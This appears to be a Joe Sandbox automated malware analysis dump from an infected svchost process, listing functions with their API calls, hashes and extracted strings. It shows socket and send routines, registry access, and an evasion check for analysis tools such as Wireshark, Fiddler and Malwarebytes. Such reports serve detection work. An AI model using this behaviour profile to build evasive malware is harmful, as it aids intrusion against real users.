                                                                                                              • Instruction ID: fd07b1a0ff772474438950da8b22df8b2110f30c9873f973082281c9a629946f
                                                                                                              • Opcode Fuzzy Hash: 46d2cb18e2b03d6891052d1edfc5dcb7ed82f3e8e54e750f1467b2edbb076cfb
                                                                                                              • Instruction Fuzzy Hash: B491BF70600612EFC725EF65D888B6ABBA5FF44704F108519E90AEB640E7B4E865CBD8
                                                                                                              Function 04DF4530 Relevance: 27.2, APIs: 18, Instructions: 247threadnetworksleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Sleep.KERNEL32(00000064), ref: 04DF455A
                                                                                                              • timeGetTime.WINMM ref: 04DF457B
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 04DF459B
                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04DF45BD
                                                                                                              • SwitchToThread.KERNEL32 ref: 04DF45D7
                                                                                                              • SetEvent.KERNEL32(?), ref: 04DF4620
                                                                                                              • CloseHandle.KERNEL32(?), ref: 04DF4644
                                                                                                              • send.WS2_32(?,04E159C0,00000010,00000000), ref: 04DF4668
                                                                                                              • SetEvent.KERNEL32(?), ref: 04DF4686
                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 04DF4691
                                                                                                              • WSACloseEvent.WS2_32(?), ref: 04DF469F
                                                                                                              • shutdown.WS2_32(?,00000001), ref: 04DF46B3
                                                                                                              • closesocket.WS2_32(?), ref: 04DF46BD
                                                                                                              • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 04DF46F6
                                                                                                              • SetLastError.KERNEL32(000005B4), ref: 04DF470A
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 04DF472B
                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 04DF4743
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                              • String ID:
                                                                                                              • API String ID: 1692523546-0
                                                                                                              • Opcode ID: 9602df2d7b024eb4692f51141d14fa8781623f029820e4a4dd955bf78afc61ad
                                                                                                              • Instruction ID: 63958ac2f28c2c0688cec394a0ac31f45debf4cac18fd110e0b8c2427d830e0e
                                                                                                              • Opcode Fuzzy Hash: 9602df2d7b024eb4692f51141d14fa8781623f029820e4a4dd955bf78afc61ad
                                                                                                              • Instruction Fuzzy Hash: 4491CD70200A12EFD734DF25DC88AABB7A5FF54705F018119EA168B654D735F891CBD0
                                                                                                              Function 04DF5D10 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 164windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 04DF5D23
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: VisibleWindow
                                                                                                              • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                                                                              • API String ID: 1208467747-3439171801
                                                                                                              • Opcode ID: c41855295b4c058742db04227d4e2c42ed7d06619569936f74badbb42774baca
                                                                                                              • Instruction ID: c82ffcfbcaba5dfa49ed7d49410c943747a7fc8a18b5f087a07ecafbb2a912b0
                                                                                                              • Opcode Fuzzy Hash: c41855295b4c058742db04227d4e2c42ed7d06619569936f74badbb42774baca
                                                                                                              • Instruction Fuzzy Hash: BB41B1B6F8161277AA313F353C12BAF218C1F2168FF066028FE14A4551FEA5B256C4F6
                                                                                                              Function 04DFC630 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 164registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 04DFC68D
                                                                                                              • _memset.LIBCMT ref: 04DFC69C
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 04DFC6BF
                                                                                                                • Part of subcall function 04DFC86E: RegCloseKey.ADVAPI32(80000000,04DFC84A), ref: 04DFC87B
                                                                                                                • Part of subcall function 04DFC86E: RegCloseKey.ADVAPI32(00000000), ref: 04DFC884
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close_memset$Open
                                                                                                              • String ID: %08X
                                                                                                              • API String ID: 4292648718-3773563069
                                                                                                              • Opcode ID: 3c23f7eb54d63afa519365826a1d8e91c0872feeb9e4cd3875391068370c72e4
                                                                                                              • Instruction ID: d33ee3f8c01431e8e9f99f6719b9d461c043b76395e95ed41994c5ae8522de4f
                                                                                                              • Opcode Fuzzy Hash: 3c23f7eb54d63afa519365826a1d8e91c0872feeb9e4cd3875391068370c72e4
                                                                                                              • Instruction Fuzzy Hash: 935154B1A50218ABEB24DF50DC85FEAB778FB44B04F805199F715A6180D774AF84CF94
                                                                                                              Function 025836D0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 025836F0
                                                                                                              • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02583729
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 02583746
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 02583759
                                                                                                              • WSACreateEvent.WS2_32 ref: 0258375B
                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,0259D990), ref: 0258376D
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,0259D990), ref: 02583779
                                                                                                              • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,0259D990), ref: 02583798
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0259D990), ref: 025837A4
                                                                                                              • gethostbyname.WS2_32(00000000), ref: 025837B2
                                                                                                              • htons.WS2_32(?), ref: 025837D8
                                                                                                              • WSAEventSelect.WS2_32(?,?,00000030), ref: 025837F6
                                                                                                              • connect.WS2_32(?,?,00000010), ref: 0258380B
                                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,0259D990), ref: 0258381A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                              • String ID:
                                                                                                              • API String ID: 1455939504-0
                                                                                                              • Opcode ID: 2090ba1cf334287026d246215e039dfd5f4d8be9d142bc312b15eb8d997c20ee
                                                                                                              • Instruction ID: c21f77ba02b2912fb2f307370bbb24b7b3504270c7ee645f1ea4ee2343e8fab3
                                                                                                              • Opcode Fuzzy Hash: 2090ba1cf334287026d246215e039dfd5f4d8be9d142bc312b15eb8d997c20ee
                                                                                                              • Instruction Fuzzy Hash: AD417E71A40205ABE710AFA5DC89F7FB7B8FB88710F504519FA16A72C0D7B0A914DF68
                                                                                                              Function 04DF36F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 04DF3710
                                                                                                              • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 04DF3749
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 04DF3766
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 04DF3779
                                                                                                              • WSACreateEvent.WS2_32 ref: 04DF377B
                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,04E21F0C), ref: 04DF378D
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,04E21F0C), ref: 04DF3799
                                                                                                              • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,04E21F0C), ref: 04DF37B8
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,04E21F0C), ref: 04DF37C4
                                                                                                              • gethostbyname.WS2_32(00000000), ref: 04DF37D2
                                                                                                              • htons.WS2_32(?), ref: 04DF37F8
                                                                                                              • WSAEventSelect.WS2_32(?,?,00000030), ref: 04DF3816
                                                                                                              • connect.WS2_32(?,?,00000010), ref: 04DF382B
                                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,04E21F0C), ref: 04DF383A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                              • String ID:
                                                                                                              • API String ID: 1455939504-0
                                                                                                              • Opcode ID: 13b9eb86749ce5a19e088cf5f9bf12bf9c90c045573ce9f44369f51a1024a2b3
                                                                                                              • Instruction ID: 8e30e5a240f89bd913a66645da9414fdf32c065047ad6aeca4b86ad7f238af1f
                                                                                                              • Opcode Fuzzy Hash: 13b9eb86749ce5a19e088cf5f9bf12bf9c90c045573ce9f44369f51a1024a2b3
                                                                                                              • Instruction Fuzzy Hash: 3E414FB1A40205ABE720DFA5DC89F7EB778FB48711F104619FB25A62D4CA78A904CB64
                                                                                                              Function 02A04E8D Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 263COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memset
                                                                                                              • String ID: !jWW$.$_$e$i$l${vU_
                                                                                                              • API String ID: 2102423945-159827627
                                                                                                              • Opcode ID: d96d58cd0dee85eeea88bc89f6b8c9c85c84e69dab6c6a1d3cc7b7916c7c487b
                                                                                                              • Instruction ID: e68e09d8bb68a3f7455c8e2defaa403d9d7f269c7b3262db150a07fa5159cad8
                                                                                                              • Opcode Fuzzy Hash: d96d58cd0dee85eeea88bc89f6b8c9c85c84e69dab6c6a1d3cc7b7916c7c487b
                                                                                                              • Instruction Fuzzy Hash: 72919875A40214AFE720DFA0DCC4FAA77BAFB89710F548159FA099B280DB75DA40CF91
                                                                                                              Function 04C7A0FF Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memset$swprintf$_malloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1873853019-0
                                                                                                              • Opcode ID: f262def3ce91393e053eae3bb2940be6660f4daf3d4d34736c51edaa37cc017b
                                                                                                              • Instruction ID: 26f0ea8b4d33074cacbe7ba91abe3334d6ea5b44a6dc5833a416a6bec755ee04
                                                                                                              • Opcode Fuzzy Hash: f262def3ce91393e053eae3bb2940be6660f4daf3d4d34736c51edaa37cc017b
                                                                                                              • Instruction Fuzzy Hash: A481E3B5A40204ABF710EF64ECC6F6B7765AF45314F0441A8EE095F387EA72F91096A2
                                                                                                              Function 02585A20 Relevance: 16.7, APIs: 11, Instructions: 227timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,E10F6199,00000000,?,00000000,02586190,00000000), ref: 02585A65
                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(025862F0,00000000), ref: 02585B04
                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02585B42
                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02585B67
                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(02586390,00000000), ref: 02585C5F
                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(025863A8,00000000), ref: 02585C80
                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02585B8C
                                                                                                                • Part of subcall function 02581280: __CxxThrowException@8.LIBCMT ref: 02581290
                                                                                                                • Part of subcall function 02581280: DeleteCriticalSection.KERNEL32(00000000,FFFFFFFF,02597DF8,?,?,02586511), ref: 025812A1
                                                                                                              • InterlockedExchange.KERNEL32(025861A8,00000000), ref: 02585CF1
                                                                                                              • timeGetTime.WINMM ref: 02585CF7
                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 02585D0B
                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02585D14
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                              • String ID:
                                                                                                              • API String ID: 1400036169-0
                                                                                                              • Opcode ID: 704eb249ff5712532eeb08b617cd35242fa5b6c05876d193b02676dabfb74cf0
                                                                                                              • Instruction ID: e674c760a0b473bdf40ffd4becd4d5a6937d2816e6a57b0bd8acc9f9834796d6
                                                                                                              • Opcode Fuzzy Hash: 704eb249ff5712532eeb08b617cd35242fa5b6c05876d193b02676dabfb74cf0
                                                                                                              • Instruction Fuzzy Hash: B9A106B0A01A46AFD714DF7AC88479AFBE8FB08314F90862ED12DD7640D774A964CF94
                                                                                                              Function 02584C90 Relevance: 16.7, APIs: 11, Instructions: 156COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetLastError.KERNEL32(0000139F,E10F6199,?,?,?,?,00000000,000000FF,00000000), ref: 02584CC6
                                                                                                              • EnterCriticalSection.KERNEL32(?,E10F6199,?,?,?,?,00000000,000000FF,00000000), ref: 02584CED
                                                                                                              • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 02584D01
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 02584D08
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                              • String ID:
                                                                                                              • API String ID: 2124651672-0
                                                                                                              • Opcode ID: 07c95c8e908e33e10d4eeda930c7042dc3b88fb810b354331983963d73361c7c
                                                                                                              • Instruction ID: 49c410e78487152ad97192d6827ee15c6d61a4545a613605ed3acd8153d4c02e
                                                                                                              • Opcode Fuzzy Hash: 07c95c8e908e33e10d4eeda930c7042dc3b88fb810b354331983963d73361c7c
                                                                                                              • Instruction Fuzzy Hash: 8B51D076A487019FC311EFA8D585B6AF7F4FF88710F00492EE90A97740EB75B8148B99
                                                                                                              Function 04DF4CB0 Relevance: 16.7, APIs: 11, Instructions: 156COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetLastError.KERNEL32(0000139F,E179827C,?,?,?,?,00000000,000000FF,00000000), ref: 04DF4CE6
                                                                                                              • EnterCriticalSection.KERNEL32(?,E179827C,?,?,?,?,00000000,000000FF,00000000), ref: 04DF4D0D
                                                                                                              • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 04DF4D21
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 04DF4D28
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                              • String ID:
                                                                                                              • API String ID: 2124651672-0
                                                                                                              • Opcode ID: b367553a7b7462d48cb0dfe2e446be09523a1e23964409fb6fd53caadde8b820
                                                                                                              • Instruction ID: ec3b636c0dd6f125c6f6bc4f6ff24b71f90925cb1ad160ff21b7514f7cc7150b
                                                                                                              • Opcode Fuzzy Hash: b367553a7b7462d48cb0dfe2e446be09523a1e23964409fb6fd53caadde8b820
                                                                                                              • Instruction Fuzzy Hash: 6D51BE76A042019FD720EFA9E884A6AF7F4FB48715F00452EEA1A97740DB35B800CB51
                                                                                                              Function 04C7BDAF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memset$_wcsrchr
                                                                                                              • String ID: D
                                                                                                              • API String ID: 170005318-2746444292
                                                                                                              • Opcode ID: 51c501c0fcba4e74bd271d3489f265b98970521ff166304b1203b595ae1cf1cd
                                                                                                              • Instruction ID: de5fec85665901c82b7cd8dc61074174136f6ed8738106e7850261aaf2b9fcc5
                                                                                                              • Opcode Fuzzy Hash: 51c501c0fcba4e74bd271d3489f265b98970521ff166304b1203b595ae1cf1cd
                                                                                                              • Instruction Fuzzy Hash: 0551C871A4031D7BEB20EB60CC85FEAB379AF14708F404599E609A6180FB71BB84CF61
                                                                                                              Function 02583DC0 Relevance: 15.1, APIs: 10, Instructions: 117memorynetworkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,0258396D,?,00000000,000000FF,00000000), ref: 02583DE5
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,0258396D,?,00000000,000000FF,00000000), ref: 02583E30
                                                                                                              • send.WS2_32(?,000000FF,00000000,00000000), ref: 02583E4E
                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 02583E61
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 02583E74
                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,0258396D,?,00000000,000000FF,00000000), ref: 02583E9C
                                                                                                              • WSAGetLastError.WS2_32(?,?,0258396D,?,00000000,000000FF,00000000), ref: 02583EA7
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,0258396D,?,00000000,000000FF,00000000), ref: 02583EBB
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 02583EF4
                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 02583F31
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1701177279-0
                                                                                                              • Opcode ID: 4359674154710e17c748fce0cd947a07b1f30f1991013b21902899532f80be1b
                                                                                                              • Instruction ID: 07b9e54ac0c9fbefa7913ca3a9ed31602a205538a8876c951c545d3e516282cf
                                                                                                              • Opcode Fuzzy Hash: 4359674154710e17c748fce0cd947a07b1f30f1991013b21902899532f80be1b
                                                                                                              • Instruction Fuzzy Hash: 6B412C72504600AFC7219F74D888BA7BBF8BB48704F45896DE85EDB240E7B1A4158F94
                                                                                                              Function 04DF3DE0 Relevance: 15.1, APIs: 10, Instructions: 117memorynetworkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,04DF398D,?,00000000,000000FF,00000000), ref: 04DF3E05
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,04DF398D,?,00000000,000000FF,00000000), ref: 04DF3E50
                                                                                                              • send.WS2_32(?,000000FF,00000000,00000000), ref: 04DF3E6E
                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 04DF3E81
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 04DF3E94
                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,04DF398D,?,00000000,000000FF,00000000), ref: 04DF3EBC
                                                                                                              • WSAGetLastError.WS2_32(?,?,04DF398D,?,00000000,000000FF,00000000), ref: 04DF3EC7
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,04DF398D,?,00000000,000000FF,00000000), ref: 04DF3EDB
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 04DF3F14
                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 04DF3F51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1701177279-0
                                                                                                              • Opcode ID: 4490f69778194e9bdf47d9ac4368b11ca282c1ce46d243d6b22666e0bb58fbb3
                                                                                                              • Instruction ID: 34ffd46cba20368648657323f8e4b22bc63824b462ef2466a5168b850f4875cd
                                                                                                              • Opcode Fuzzy Hash: 4490f69778194e9bdf47d9ac4368b11ca282c1ce46d243d6b22666e0bb58fbb3
                                                                                                              • Instruction Fuzzy Hash: A04108716046019FD7209F79D988AA7B7F8FF48301F06896EED6ACB244E735F8418B60
                                                                                                              Function 02584F10 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 02584F43
                                                                                                              • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 02584F58
                                                                                                              • WSASetLastError.WS2_32(00002746), ref: 02584F6A
                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 02584F71
                                                                                                              • timeGetTime.WINMM ref: 02584F9F
                                                                                                              • timeGetTime.WINMM ref: 02584FC7
                                                                                                              • SetEvent.KERNEL32(?), ref: 02585005
                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02585011
                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 02585018
                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 0258502B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                              • String ID:
                                                                                                              • API String ID: 1979691958-0
                                                                                                              • Opcode ID: a61d024050c8820aaaa41f6a454d1e2c8d93a8f6477922c172a550bcdb6f34d5
                                                                                                              • Instruction ID: 1f03504421ac3d96e255c22036c694831e4b1deec87d023af079e75570f41fa0
                                                                                                              • Opcode Fuzzy Hash: a61d024050c8820aaaa41f6a454d1e2c8d93a8f6477922c172a550bcdb6f34d5
                                                                                                              • Instruction Fuzzy Hash: 77412631A00301DFD721EF28D548B6ABBE9FF48314F814958E98ADB341F7B1E4648B88
                                                                                                              Function 04C74DEF Relevance: 14.0, APIs: 9, Instructions: 467COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _strcat_s$_memset$__localtime64__time64__wcsnicmp_malloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 3592133475-0
                                                                                                              • Opcode ID: b7cb735c84752804069efcc85374136dcd61237d0bc07c099967b7b64fc6fcc4
                                                                                                              • Instruction ID: fec01a741d77e9c7e9b37871fb5c55fa9a52288f52b82410c437ebae1447a736
                                                                                                              • Opcode Fuzzy Hash: b7cb735c84752804069efcc85374136dcd61237d0bc07c099967b7b64fc6fcc4
                                                                                                              • Instruction Fuzzy Hash: EA02C6B1A00614AFE724DB64CC81FEAB7B9EF48304F448558F71AA7281EB70BA45CF55
                                                                                                              Function 025834E0 Relevance: 13.6, APIs: 9, Instructions: 116COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 02583640: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02583647
                                                                                                                • Part of subcall function 02583640: _free.LIBCMT ref: 0258367C
                                                                                                                • Part of subcall function 02583640: _malloc.LIBCMT ref: 025836B7
                                                                                                                • Part of subcall function 02583640: _memset.LIBCMT ref: 025836C5
                                                                                                              • InterlockedIncrement.KERNEL32(0259D990), ref: 02583545
                                                                                                              • InterlockedIncrement.KERNEL32(0259D990), ref: 02583553
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0258357A
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 02583593
                                                                                                              • ResetEvent.KERNEL32(?,?,?,0259D990), ref: 025835CE
                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02583601
                                                                                                              • GetLastError.KERNEL32 ref: 02583619
                                                                                                                • Part of subcall function 02583F50: GetCurrentThreadId.KERNEL32 ref: 02583F55
                                                                                                                • Part of subcall function 02583F50: send.WS2_32(?,02597420,00000010,00000000), ref: 02583FB6
